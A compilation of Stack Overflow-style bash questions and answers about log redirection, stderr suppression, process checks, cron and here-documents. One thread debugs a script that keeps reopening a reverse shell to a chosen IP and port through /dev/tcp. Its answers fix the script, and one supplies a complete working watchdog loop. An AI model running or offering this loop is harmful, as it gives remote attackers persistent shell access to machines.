Why does Linux redirection lose info? - linux

I wrote a script like this:
#!/bin/bash
LOG_PATH=/root/cngiqos-log
LOG_NAME=term.log
TERM_PATH=/home/bnrcqos/qos_M11/term
test -d $LOG_PATH || mkdir -p $LOG_PATH
routeID='M11'
if [ `ps -ef | grep 'term$' | grep -v grep | wc -l` -gt 0 ]; then
echo $routeID' term process is already running'
else
cd $TERM_PATH
(nohup ./term > $LOG_PATH/$LOG_NAME 2>&1 &)
fi
Then I run "tail -f /root/cngiqos-log/term.log" to watch the log, but it loses info: only part of the log is output and then nothing more appears. When I run "./term" in the foreground instead, the output is fine.
Does anybody know why? Is it a system bug?

Maybe you just got what you asked for? tail only shows the last 10 lines by default.
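If you want to see the whole file rather than just the last 10 lines, tail can start from the first line instead (using the log path from the question):

tail -n +1 -f /root/cngiqos-log/term.log

The -n +1 option makes tail begin at line 1 of the file, and -f keeps following new output as term writes it.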

Related

Failing to redirect error message in my command

I'm a rookie in bash scripting, and here's basically my bash script:
Z=`diff -Z $ref_out $exec_out | grep "[<>]" | wc -l` 2>/dev/null
if [ $Z -gt 0 ]; then
echo "*** testcase: [ stdout - FAILED ]"
else
echo "*** testcase: [ stdout - PASSED ]"
fi
I would like to suppress the error message from diff such as:
diff: No such file or directory
The error can come from a missing $ref_out or $exec_out file. Even though I'm redirecting to /dev/null, the message still shows up.
Any help?
You need diff's stderr to go to /dev/null, so it should instead be:
Z=`diff -Z $ref_out $exec_out 2> /dev/null | grep "[<>]" | wc -l`
Your redirection isn't working because it is applied to the variable assignment in the parent shell, not to the pipeline running inside the command substitution.
If you want to send the stderr of a bunch of commands to /dev/null, you could do it this way - I am using $() instead of backticks:
Z=$( { diff -Z $ref_out $exec_out | grep "[<>]" | wc -l; } 2>/dev/null )
Here, 2>/dev/null applies to all the commands inside { }.
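A quick toy example (not from the original post) shows the grouping behaviour:

{ echo to-stdout; echo to-stderr >&2; } 2>/dev/null

This prints only to-stdout, because the single redirection covers the stderr of every command inside the braces.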
There are many issues in your code. You could rewrite it in a better way:
if diff -Z "$ref_out" "$exec_out" 2>/dev/null | grep -q "[<>]"; then
echo "*** testcase: [ stdout - FAILED ]"
else
echo "*** testcase: [ stdout - PASSED ]"
fi
grep -q is a better way to do this check; you don't need wc -l unless you want to know the exact number of matches.
You need to quote your variables.
An if statement can run commands directly; you don't need to capture the output in order to use it in the if condition.
You can use shellcheck to validate your shell script and catch the common mistakes that can break your code.
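For example, assuming the snippet is saved as testcase.sh (a hypothetical file name):

shellcheck testcase.sh

Among other things, it will warn about the unquoted $ref_out and $exec_out and suggest $( ) instead of backticks.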

Error "Integer Expression Expected" in Bash script

So, I'm trying to write a bash script that phones home with a reverse shell to a certain IP if the program isn't already running. It's supposed to check every 20 seconds whether the process is alive, and if it isn't, it executes the shell. However, when I attempt to execute my program I get the error:
./ReverseShell.sh: line 9: [: ps -ef | grep "bash -i" | grep -v grep | wc -l: integer expression expected
This is because I'm using -eq in my if statement. When I replace -eq with =, the script runs, but the test gives the same result no matter what.
What am I doing wrong? My code is below.
#!/bin/bash
#A small program designed to establish and keep a reverse shell open
IP="" #Insert your IP here
PORT="" #Insert the Port you're listening on here.
while(true); do
if [ 'ps -ef | grep "bash -i" | grep -v grep | wc -l' -eq 0 ]
then
echo "Process not found, launching reverse shell to $IP on port $PORT"
bash -i >& /dev/tcp/$IP/$PORT 0>&1
sleep 20
else
echo "Process found, sleeping for 20 seconds..."
ps -ef | grep "bash -i" | grep -v "grep" | wc -l
sleep 20
fi
done
There is a small change required in your code.
You have to use backticks "`" instead of single quotes "''" inside the if.
if [ `ps -ef | grep "bash -i" | grep -v grep | wc -l` -eq 0 ]
This worked for me. Hope it helps you too.
Besides the typo mentioned in the comments it should be:
if ! pgrep -f 'bash -i' > /dev/null ; then
echo "process not found"
else
echo "process found"
fi
Since pgrep exits with a success (zero) status if at least one process was found and a non-zero status if no process was found, you can use it directly in the if condition. [ (which is itself a command) is not required.
PS: Just realized that this has also been mentioned in the comments an hour ago. I'll keep it, because it is IMO good practice.
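Putting that together, a minimal sketch of the whole watchdog loop built around pgrep (keeping the IP/PORT placeholders from the question):

#!/bin/bash
# Watchdog sketch: relaunch the reverse shell whenever no 'bash -i' is running.
IP=""   # insert your IP here
PORT="" # insert the port you're listening on here
while true; do
    if ! pgrep -f 'bash -i' > /dev/null; then
        echo "Process not found, launching reverse shell to $IP on port $PORT"
        bash -i >& "/dev/tcp/$IP/$PORT" 0>&1
    else
        echo "Process found, sleeping for 20 seconds..."
    fi
    sleep 20
done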

How to use grep in Linux for multiple '&' based search

I am trying to find out whether two processes, pmon and smon, are running on the Linux machine where my Oracle is installed.
I used the commands below for it:
ps -ae | grep pmon > /dev/null;echo $?
and
ps -ae | grep smon > /dev/null;echo $?
Now I want to combine both commands into a single one.
I know grep has an option for this:
ps -ae | grep 'pmon\|smon' > /dev/null;echo $?
But the problem here is that it returns exit code 0 if either of the processes is running.
I want an AND-based search instead: the command should return 0 only if both processes are running.
I would suggest you use something like this:
if ps -ae | grep -q pmon && ps -ae | grep -q smon; then
echo "pmon and smon are running"
fi
The -q switch to grep prevents any output so you don't have to redirect to /dev/null yourself. If you have pgrep, you may be able to use that instead of piping ps to grep.
Of course, you could "optimise" this into one line, using another && instead of the if, but I really don't see the advantage!
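For completeness, that one-liner might look like this (a sketch equivalent to the if above):

ps -ae | grep -q pmon && ps -ae | grep -q smon && echo "pmon and smon are running"

The second grep only runs when the first one found a match, so the message appears only if both processes exist.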
You can try this:
pgrep pmon > /dev/null && pgrep smon > /dev/null; echo $?
or
pgrep pmon > /dev/null && pgrep smon > /dev/null && echo both running
Try this:
ps -ae | egrep 'pmon|smon'
Note that egrep alternation uses |, not a comma; also, this matches either process, so it only covers the OR case, not the AND check the question asks for.

Why does part of the script not execute from crontab?

I have a script stopping the application and zipping some files:
/home/myname/project/stopWithZip.sh
With the following permissions:
-rwxrwxr-x. 1 myname myname 778 Jun 25 13:48 stopWithZip.sh
Here is the content of the script:
ps -ef | grep project | grep -v grep | awk '{print $2}' |xargs kill -15
month=`date +%m`
year=`date +%Y`
fixLogs=~/project/log/fix/$year$month/*.log.*
errorLogs=~/project/log/error/$year$month/log.*
for log in $fixLogs
do
if [ ! -f "$log.gz" ];
then
gzip $log
echo "Archived:"$log
else
echo "skipping" $log
fi
done
echo "Archived fix log files done"
for log in $errorLogs
do
if [ ! -f "$log.gz" ]; then
gzip $log
echo "Archived:"$log
else
echo "skipping" $log
fi
done
echo "Archived errorlog files done"
The problem is that apart from the ps -ef | grep project | grep -v grep | awk '{print $2}' | xargs kill -15 command, the gzip commands are not executed. I totally don't understand why.
I cannot see any compressed logs in the directory.
BTW, when I execute stopWithZip.sh explicitly on the command line, it works perfectly fine.
In crontab:
00 05 * * 2-6 /home/myname/project/stopWithZip.sh >> /home/myname/project/cronlog/$(date +"\%F")-stop.log 2>&1 (does NOT work)
In command line:
/home/myname/project>./stopWithZip.sh (works)
Please help
The script fails when run under cron because your script is invoked with project in its path, so the kill pipeline kills the script too.
You could prove (or disprove) this by adding some tracing. Log the output of ps and of awk to log files:
ps -ef |
tee /tmp/ps.log.$$ |
grep project |
grep -v grep |
awk '{print $2}' |
tee /tmp/awk.log.$$ |
xargs kill -15
Review the logs and see that your script is one of the processes being killed.
The crontab entry contains:
/home/myname/project/stopWithZip.sh >> /home/myname/project/cronlog/$(date +"\%F")-stop.log 2>&1
When ps lists that, it contains 'project' and does not contain 'grep' so the kill in the script kills the script itself.
When you run it from the command line (using a conventional '$' as the prompt), you run:
$ ./stopWithZip.sh
and when ps lists that, it does not contain 'project' so it is not killed.
If you ran:
$ /home/myname/project/stopWithZip.sh >> /home/myname/project/cronlog/$(date +"\%F")-stop.log 2>&1
from the command line, like you do with cron (crontab), you would find it fails.
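One possible fix (a sketch, not part of the original answer): make the pipeline skip the script's own PID, so the cron-invoked script survives its own kill:

ps -ef | grep project | grep -v grep | awk -v self="$$" '$2 != self {print $2}' | xargs -r kill -15

Here $$ is the PID of the running script, and xargs -r (a GNU extension) skips the kill entirely when nothing is left to signal.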

BASH script: here-document creation hangs

I've found that a piece of my bash script causes the hang. I've extracted it here:
#!/bin/bash
cat << EndOfFspreadFile >> ./myscript.sh
echo Enter Source Path :
read SRCPATH
FILECNT=`find $SRCPATH/* 2>/dev/null | wc -l`
FILECNTERR=`find $SRCPATH/* 2>&1 | grep "find:" | wc -l`
echo count : $FILECNT
echo problems : $FILECNTERR
EndOfFspreadFile
echo done
This script is only expected to append the here-document block to the myscript.sh file. But it just HANGS!
Thanks!
- Mohamed -
Your $ variables and backquotes get expanded. You need to escape them in the script.
Right now you end up searching the entire filesystem.
Basically, because $SRCPATH is empty while the here-document is being written, find $SRCPATH/* 2>/dev/null | wc -l gets executed as find /* 2>/dev/null | wc -l at script-generation time, not when myscript.sh runs.
Here is how you can rewrite it (just one line example):
FILECNT=\$(find \$SRCPATH/* 2>/dev/null | wc -l)
By the way, it's easy to see what is happening if you run bash -x <your script>.
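Alternatively (a sketch of an equivalent fix): quoting the here-document delimiter disables all expansion inside the block, so nothing needs to be escaped:

#!/bin/bash
# The quoted delimiter makes bash copy the block verbatim; $SRCPATH and
# $( ) are expanded only when myscript.sh itself runs.
cat << 'EndOfFspreadFile' >> ./myscript.sh
echo Enter Source Path :
read SRCPATH
FILECNT=$(find $SRCPATH/* 2>/dev/null | wc -l)
FILECNTERR=$(find $SRCPATH/* 2>&1 | grep "find:" | wc -l)
echo count : $FILECNT
echo problems : $FILECNTERR
EndOfFspreadFile
echo done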
